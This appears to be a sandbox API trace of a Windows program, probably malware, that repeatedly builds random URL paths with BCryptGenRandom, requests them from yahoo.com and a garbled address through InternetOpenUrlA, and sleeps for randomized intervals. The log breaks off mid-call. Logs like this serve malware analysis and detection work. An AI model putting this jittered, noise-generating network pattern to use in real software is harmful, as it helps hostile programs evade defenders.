lpString1="þ]¡´s://www.yahoo.com") returned="þ]¡´s://www.yahoo.com" [0269.236] lstrcatA (in: lpString1="þ]¡´s://www.yahoo.com", lpString2="/l70Q1s31pk0j6sidJxaQl35sr3on4VtzUdFccT/17v1iZZsDbJrtOeM7ey2mgwbhe9jsktsib8XsgR/Vc4e88tapp9guK2hi7fkXkpfnLD9kvkvatsq8z0/yrf4hHvAk9ksghywokx47b7MSywok2i8e0nz/Z6r686c85Mgs7xq00wknp62f0CP0z4Y/" | out: lpString1="þ]¡´s://www.yahoo.com/l70Q1s31pk0j6sidJxaQl35sr3on4VtzUdFccT/17v1iZZsDbJrtOeM7ey2mgwbhe9jsktsib8XsgR/Vc4e88tapp9guK2hi7fkXkpfnLD9kvkvatsq8z0/yrf4hHvAk9ksghywokx47b7MSywok2i8e0nz/Z6r686c85Mgs7xq00wknp62f0CP0z4Y/") returned="þ]¡´s://www.yahoo.com/l70Q1s31pk0j6sidJxaQl35sr3on4VtzUdFccT/17v1iZZsDbJrtOeM7ey2mgwbhe9jsktsib8XsgR/Vc4e88tapp9guK2hi7fkXkpfnLD9kvkvatsq8z0/yrf4hHvAk9ksghywokx47b7MSywok2i8e0nz/Z6r686c85Mgs7xq00wknp62f0CP0z4Y/" [0269.237] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0269.237] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="þ]¡´s://www.yahoo.com/l70Q1s31pk0j6sidJxaQl35sr3on4VtzUdFccT/17v1iZZsDbJrtOeM7ey2mgwbhe9jsktsib8XsgR/Vc4e88tapp9guK2hi7fkXkpfnLD9kvkvatsq8z0/yrf4hHvAk9ksghywokx47b7MSywok2i8e0nz/Z6r686c85Mgs7xq00wknp62f0CP0z4Y/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0269.237] GetProcessHeap () returned 0x440000 [0269.237] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0269.237] GetProcessHeap () returned 0x440000 [0269.237] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02b50 | out: hHeap=0x440000) returned 1 [0269.237] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0269.238] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0269.238] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0269.238] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0269.238] Sleep (dwMilliseconds=0x175c5) [0269.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0269.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0269.403] GetProcessHeap () returned 0x440000 [0269.403] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0269.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0269.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x20, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0269.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0269.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0269.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0269.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b271, cbBuffer=0x22, dwFlags=0x2 | out: pbBuffer=0x3a1b271) returned 0x0 [0269.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0269.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0269.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0269.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.419] GetProcessHeap () returned 0x440000 [0269.419] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473560 [0269.419] lstrcpyA (in: lpString1=0x473560, lpString2="P²¡\x03" | out: lpString1="P²¡\x03") returned="P²¡\x03" [0269.419] lstrcatA (in: lpString1="P²¡\x03", lpString2="/9p27BKfxecshhTz2JpNoouerbQTCrcl/Xeuz8dzknibRmEyGlR5iscqmy3xr9pcvd/" | out: lpString1="P²¡\x03/9p27BKfxecshhTz2JpNoouerbQTCrcl/Xeuz8dzknibRmEyGlR5iscqmy3xr9pcvd/") returned="P²¡\x03/9p27BKfxecshhTz2JpNoouerbQTCrcl/Xeuz8dzknibRmEyGlR5iscqmy3xr9pcvd/" [0269.420] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0269.420] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P²¡\x03/9p27BKfxecshhTz2JpNoouerbQTCrcl/Xeuz8dzknibRmEyGlR5iscqmy3xr9pcvd/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0269.420] GetProcessHeap () returned 0x440000 [0269.420] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473560 | out: hHeap=0x440000) returned 1 [0269.420] GetProcessHeap () returned 0x440000 [0269.420] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0269.420] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0269.420] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0269.421] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0269.421] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0269.421] Sleep (dwMilliseconds=0x1c35d) [0269.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0269.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0269.601] GetProcessHeap () returned 0x440000 [0269.601] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0269.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0269.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0269.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.748] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.748] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0269.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b265, cbBuffer=0x2b, dwFlags=0x2 | out: pbBuffer=0x3a1b265) returned 0x0 [0269.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, 